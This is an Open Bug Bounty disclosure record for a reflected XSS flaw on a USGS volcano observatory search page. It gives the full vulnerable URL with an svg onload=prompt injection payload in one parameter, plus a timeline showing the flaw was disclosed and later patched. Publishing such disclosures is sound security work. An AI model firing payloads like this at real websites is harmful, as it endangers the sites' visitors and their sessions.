hvo.wr.usgs.gov XSS vulnerability

2016-03-14T01:37:00
ID OBB:141391
Type openbugbounty
Reporter ahmetomeroglu
Modified 2016-08-29T17:33:00

Description

Vulnerable URL:
http://hvo.wr.usgs.gov/volcanowatch/searchSubmit.php?token=788fed4cefcf457afc6984efa7c19031a3325d2a93527293d2ced18bf9b7bb97&newSearch=true&title=test&article=%27%22%3E%3Csvg%20onload=prompt%28/XSSPOSED/%29%3E&weeklyUpdate=&startDate=&endDate=&searchType=inclusive&__ncforminfo=JfASMHPbBq9oOIvUaE_aDJ7i8KahOz2DPYrbrLVUhy_Yk7_zG0laRUSttbln_N-USaDpf12pMmugLtxKDkT8VXglwCTe4km9jUlkcj5GMaA_nEaoAZAmBEZdpfuz1SanDxcqKLDN8dK-UVcUYwDmMuw-1qeH76QF_S_IDKknnd6xDfZLerop7A%3D%3D
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 7
VIP website status:| Yes
Check hvo.wr.usgs.gov SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 March, 2016 01:37 GMT
Generic security notifications sent to website owner| 14 March, 2016 01:39 GMT
Notification sent to subscribers (without technical details)| 14 March, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 29 August, 2016 02:12 GMT
Vulnerability patched by the website owner| 29 August, 2016 17:33 GMT